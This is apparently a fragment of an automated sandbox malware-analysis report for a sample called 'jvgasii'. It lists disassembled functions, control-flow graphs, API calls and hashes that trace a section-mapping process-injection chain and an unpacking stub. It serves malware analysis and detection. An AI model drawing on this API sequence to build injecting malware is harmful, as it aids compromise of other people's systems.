                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
                                                                                                                            • Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
                                                                                                                            • Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24
                                                                                                                            Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 291 401549-40156e call 401193 295 401570 291->295 296 401573-401578 291->296 295->296 298 401898-4018a0 296->298 299 40157e-40158f 296->299 298->296 302 4018a5-4018b7 298->302 303 401595-4015be 299->303 304 401896 299->304 310 4018c5 302->310 311 4018bc-4018e3 call 401193 302->311 303->304 312 4015c4-4015db NtDuplicateObject 303->312 304->302 310->311 312->304 314 4015e1-401605 NtCreateSection 312->314 316 401661-401687 NtCreateSection 314->316 317 401607-401628 NtMapViewOfSection 314->317 316->304 320 40168d-401691 316->320 317->316 319 40162a-401646 NtMapViewOfSection 317->319 319->316 322 401648-40165e 319->322 320->304 323 401697-4016b8 NtMapViewOfSection 320->323 322->316 323->304 326 4016be-4016da NtMapViewOfSection 323->326 326->304 328 4016e0 call 4016e5 326->328
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction ID: 7a8a064d68380c64131d995910f5c092f0e660b32494b1024d3e535184c76cf3
                                                                                                                            • Opcode Fuzzy Hash: 2c5afbad373231fc2fe72851e77a16272d6e8026ab94bc2156a59f1271be232c
                                                                                                                            • Instruction Fuzzy Hash: 78510875900249BFEF209F91CC48FAFBBB8FF86B10F144159F911AA2A5E6709940CB24
                                                                                                                            Function 00401557 Relevance: 10.7, APIs: 7, Instructions: 162nativeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 330 401557 331 40155b-40156e call 401193 330->331 332 40154f-401554 330->332 335 401570 331->335 336 401573-401578 331->336 332->331 335->336 338 401898-4018a0 336->338 339 40157e-40158f 336->339 338->336 342 4018a5-4018b7 338->342 343 401595-4015be 339->343 344 401896 339->344 350 4018c5 342->350 351 4018bc-4018e3 call 401193 342->351 343->344 352 4015c4-4015db NtDuplicateObject 343->352 344->342 350->351 352->344 354 4015e1-401605 NtCreateSection 352->354 356 401661-401687 NtCreateSection 354->356 357 401607-401628 NtMapViewOfSection 354->357 356->344 360 40168d-401691 356->360 357->356 359 40162a-401646 NtMapViewOfSection 357->359 359->356 362 401648-40165e 359->362 360->344 363 401697-4016b8 NtMapViewOfSection 360->363 362->356 363->344 366 4016be-4016da NtMapViewOfSection 363->366 366->344 368 4016e0 call 4016e5 366->368
                                                                                                                            APIs
                                                                                                                            • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                            • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
                                                                                                                            • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
                                                                                                                            • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
                                                                                                                            • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$View$Create$DuplicateObject
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1546783058-0
                                                                                                                            • Opcode ID: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction ID: 25abb30e6883f9026caabbb74ebb32c420b3dbd3b7f631cb87a4d5ab1caa8f11
                                                                                                                            • Opcode Fuzzy Hash: 2a6c5c204d9128e257f6824072ce96b4ac123ccef225123859878a505f2b6fa6
                                                                                                                            • Instruction Fuzzy Hash: C75118B5900209BFEF209F91CC48FAFBBB8FF85B10F144169F911BA2A5D6709940CB24
                                                                                                                            Function 00402F97 Relevance: 3.2, APIs: 2, Instructions: 172nativethreadCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 371 402f97-402fbb 372 402fc1-402fd9 371->372 373 4030ee-4030f3 371->373 372->373 374 402fdf-402ff0 372->374 375 402ff2-402ffb 374->375 376 403000-40300e 375->376 376->376 377 403010-403017 376->377 378 403039-403040 377->378 379 403019-40301c 377->379 380 403042-403044 378->380 382 403062-403065 378->382 379->380 381 40301e-403027 379->381 383 403045 380->383 381->383 384 403029-403038 381->384 385 403067-40306a 382->385 386 40306e 382->386 388 403047-403061 383->388 389 40306b-40306c 383->389 384->378 385->386 385->389 386->375 387 40306f 386->387 390 403070-403075 387->390 388->382 389->390 390->373 391 403077-40307a 390->391 391->373 392 40307c-4030eb RtlCreateUserThread NtTerminateProcess 391->392 392->373
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateProcessTerminateThreadUser
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1921587553-0
                                                                                                                            • Opcode ID: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction ID: 181ab879d947f068327b1ec0ddd27223b5b0ac2a90c427e8f19d47aa25efb225
                                                                                                                            • Opcode Fuzzy Hash: c5436c7e7e6e3e410a730c8ca40359fc9cb55dc58de8f82c61b8b97930139c1a
                                                                                                                            • Instruction Fuzzy Hash: 67417631228E0C4FD3A8DF2CA845BA277D5FB94311F6643AAE809D3389FA74C80183C5
                                                                                                                            Function 006B003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 68 6b003c-6b0047 69 6b0049 68->69 70 6b004c-6b0263 call 6b0a3f call 6b0e0f call 6b0d90 VirtualAlloc 68->70 69->70 85 6b028b-6b0292 70->85 86 6b0265-6b0289 call 6b0a69 70->86 88 6b02a1-6b02b0 85->88 90 6b02ce-6b03c2 VirtualProtect call 6b0cce call 6b0ce7 86->90 88->90 91 6b02b2-6b02cc 88->91 97 6b03d1-6b03e0 90->97 91->88 98 6b0439-6b04b8 VirtualFree 97->98 99 6b03e2-6b0437 call 6b0ce7 97->99 101 6b04be-6b04cd 98->101 102 6b05f4-6b05fe 98->102 99->97 104 6b04d3-6b04dd 101->104 105 6b077f-6b0789 102->105 106 6b0604-6b060d 102->106 104->102 108 6b04e3-6b0505 104->108 109 6b078b-6b07a3 105->109 110 6b07a6-6b07b0 105->110 106->105 111 6b0613-6b0637 106->111 120 6b0517-6b0520 108->120 121 6b0507-6b0515 108->121 109->110 112 6b086e-6b08be LoadLibraryA 110->112 113 6b07b6-6b07cb 110->113 114 6b063e-6b0648 111->114 119 6b08c7-6b08f9 112->119 117 6b07d2-6b07d5 113->117 114->105 115 6b064e-6b065a 114->115 115->105 118 6b0660-6b066a 115->118 122 6b07d7-6b07e0 117->122 123 6b0824-6b0833 117->123 126 6b067a-6b0689 118->126 128 6b08fb-6b0901 119->128 129 6b0902-6b091d 119->129 130 6b0526-6b0547 120->130 121->130 124 6b07e2 122->124 125 6b07e4-6b0822 122->125 127 6b0839-6b083c 123->127 124->123 125->117 132 6b068f-6b06b2 126->132 133 6b0750-6b077a 126->133 127->112 134 6b083e-6b0847 127->134 128->129 131 6b054d-6b0550 130->131 135 6b05e0-6b05ef 131->135 136 6b0556-6b056b 131->136 137 6b06ef-6b06fc 132->137 138 6b06b4-6b06ed 132->138 133->114 139 6b084b-6b086c 134->139 140 6b0849 134->140 135->104 142 6b056f-6b057a 136->142 143 6b056d 136->143 144 6b074b 137->144 145 6b06fe-6b0748 137->145 138->137 139->127 140->112 146 6b059b-6b05bb 142->146 147 6b057c-6b0599 142->147 143->135 144->126 145->144 152 6b05bd-6b05db 146->152 147->152 152->131
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 006B024D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_6b0000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction ID: 1cbfe1bad8ad953d37be5dc3ae992457c84081cda89f7c9b413a08e1e8265b97
                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                            • Instruction Fuzzy Hash: 275279B5A00229DFDB64CF58C984BA9BBB1BF09304F1480E9E50DAB351DB30AE85DF14
                                                                                                                            Function 00418AF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63librarymemoryloaderCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 370 418af0-418c30 GetModuleHandleW GetProcAddress VirtualProtect
                                                                                                                            APIs
                                                                                                                            • GetModuleHandleW.KERNEL32(00514D70), ref: 00418BCF
                                                                                                                            • GetProcAddress.KERNEL32(00000000,0041F298), ref: 00418C0C
                                                                                                                            • VirtualProtect.KERNELBASE(00514BB4,00514D6C,00000040,?), ref: 00418C2B
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_40b000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2099061454-3916222277
                                                                                                                            • Opcode ID: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction ID: 441cc07c50422e985bd597f44fd2245cc03bf1e09111bb194a1dfbca8cfcce31
                                                                                                                            • Opcode Fuzzy Hash: 41ccab38266b7cc203b6ab2e2252d2e1a9a4558b246985cc843167c3f4a64001
                                                                                                                            • Instruction Fuzzy Hash: 88314918508680CAEB01DB78FC057923B66AB75709F04E0B9D14C8B7B1D7BB051E9B6A
                                                                                                                            Function 007E0AE7 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 393 7e0ae7-7e0b00 394 7e0b02-7e0b04 393->394 395 7e0b0b-7e0b17 CreateToolhelp32Snapshot 394->395 396 7e0b06 394->396 397 7e0b19-7e0b1f 395->397 398 7e0b27-7e0b34 Module32First 395->398 396->395 397->398 404 7e0b21-7e0b25 397->404 399 7e0b3d-7e0b45 398->399 400 7e0b36-7e0b37 call 7e07a6 398->400 405 7e0b3c 400->405 404->394 404->398 405->399
                                                                                                                            APIs
                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 007E0B0F
                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 007E0B2F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7dd000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3833638111-0
                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction ID: 6243af257bd6482d5254a30fe8d0f6230318426562d932069a697e55021b0894
                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                            • Instruction Fuzzy Hash: 5AF0C231101351ABD7202BB6AC8DF6A72E8BF4C328F100528E642910C0DAB8E8858AA0
                                                                                                                            Function 006B0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 406 6b0e0f-6b0e24 SetErrorMode * 2 407 6b0e2b-6b0e2c 406->407 408 6b0e26 406->408 408->407
                                                                                                                            APIs
                                                                                                                            • SetErrorMode.KERNELBASE(00000400,?,?,006B0223,?,?), ref: 006B0E19
                                                                                                                            • SetErrorMode.KERNELBASE(00000000,?,?,006B0223,?,?), ref: 006B0E1E
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516805210.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006B0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_6b0000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: ErrorMode
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2340568224-0
                                                                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction ID: 5ec0122905795958cf8b6ea84eb92189ad46b0a0d2fb6fa6a8bc84ef3f06bca4
                                                                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                                                                            • Instruction Fuzzy Hash: 19D0123114512877D7002A94DC09BCE7F1CDF05B62F008411FB0DD9180C770994147E5
                                                                                                                            Function 004016E5 Relevance: 1.6, APIs: 1, Instructions: 131COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 409 4016e5 410 4016e7 409->410 411 4016ec-4016f0 409->411 410->411 412 4016e9 410->412 413 4016f2-401725 411->413 414 401716-401737 411->414 412->411 413->414 421 40173a-401771 414->421 433 401773-40179c 421->433 438 4017a6 433->438 439 40179e-4017a4 433->439 440 4017ac-4017b2 438->440 439->440 441 4017c2-4017c6 440->441 442 4017b4-4017c0 440->442 441->440 443 4017c8-4017cd 441->443 442->441 444 401835-401844 443->444 445 4017cf call 4017d4 443->445 447 401847-40184a 444->447 445->444 448 401874-4018b7 HeapCreate 447->448 449 40184c-401856 447->449 459 4018c5 448->459 460 4018bc-4018e3 call 401193 448->460 451 401859-401862 449->451 452 401870 451->452 453 401864-40186e 451->453 452->451 455 401872 452->455 453->452 455->447 459->460
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction ID: d7122d48263ec7d897cf7d78cd76de1228cda3bcac40411fc7d625d9091ea59c
                                                                                                                            • Opcode Fuzzy Hash: c9d1cf4a24c3fc6c96abbd772e43917d0267fad9e090bec43cac2cfb706a48c3
                                                                                                                            • Instruction Fuzzy Hash: AC41CE37908104DBDB14AA54C844ABA73A1AF84304F39853BD857776F0D67CAA43E79F
                                                                                                                            Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 467 4018e6-40194b call 401193 Sleep call 40141f 481 40195a-4019a5 call 401193 467->481 482 40194d-401955 call 401514 467->482 482->481
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                                                                            • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                                                                            • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                                                                            Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 496 401915-401918 497 4018c6-4018c7 496->497 498 40191a-40194b call 401193 Sleep call 40141f 496->498 499 4018d7 497->499 500 4018ce-4018e3 call 401193 497->500 510 40195a-4019a5 call 401193 498->510 511 40194d-401955 call 401514 498->511 499->500 511->510
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                                                                            • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                                                                            • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                                                                            Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 525 4018f1-40194b call 401193 Sleep call 40141f 535 40195a-4019a5 call 401193 525->535 536 40194d-401955 call 401514 525->536 536->535
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                                                                            • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                                                                            • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                                                                            Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                                                                            • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                                                                            • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                                                                            Function 007E07A6 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 007E07F7
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2517016123.00000000007DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 007DD000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_7dd000_jvgasii.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocVirtual
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4275171209-0
                                                                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction ID: 87d50c798d86d2e63bb831bfa1218a57fb5ecba0c6fa302f1ff768abe5681920
                                                                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                            • Instruction Fuzzy Hash: 14113C79A00208EFDB01DF99C985E98BBF5EF08750F0580A4F9489B362D375EA90DF80
                                                                                                                            Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                                                                              • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                                                                              • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                                                                              • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516620134.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_6_2_400000_jvgasii.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Section$CreateDuplicateObjectSleepView
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1885482327-0
                                                                                                                            • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                                                                            • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                                                                            • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F
                                                                                                                            Function 00418AC0 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • LocalAlloc.KERNELBASE(00000000,00514D6C,0041912F), ref: 00418AC8
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000006.00000002.2516656554.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
